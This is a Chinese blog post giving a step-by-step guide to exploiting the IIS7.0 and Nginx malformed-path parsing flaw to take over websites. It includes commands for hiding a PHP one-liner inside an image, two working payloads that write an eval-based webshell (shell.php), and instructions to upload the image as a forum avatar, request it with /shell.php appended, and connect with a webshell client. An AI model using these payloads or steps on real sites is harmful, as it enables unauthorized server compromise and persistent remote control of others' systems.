iis7 php漏洞,通杀IIS7.0畸形解析0day漏洞

先合并一张PHP一句话图片马,合并方法:

①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif

②、用edjpgcom,进行图片和一句话木马的合并,

图片随便找一张.

【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到

edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】

一句话:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval_r($_POST[cmd])?>’);?>

然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。

找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。

比如假设图片地址为http://www.xxx.com/fuck/1.jpg

则执行地址为http://www.xxx.com/fuck/1.jpg/shell.php

然后,会在目录下生成shell.php。

比如:http://www.xxx.com/tupian/shell.php

shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。

找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),

把PHP大马后缀改成.jpg,传上去,得到图片地址。

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。

<?fputs (fopen(“fuck.php”,”w”),”<?eval_r($_POST[fuck]);?>”)?>

做好一句话图片木马后往头像上传,访问头像地址,在后面随便加个/xx.php

剩下的你们懂得!

评语:感觉非常强悍,怪不得之前暗组的一个大牛说,MS为了修补IIS6.0的解析漏洞,出了IIS7.0,之后爆了一个更厉害的解析漏洞,然后就急忙发布IIS7.5

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值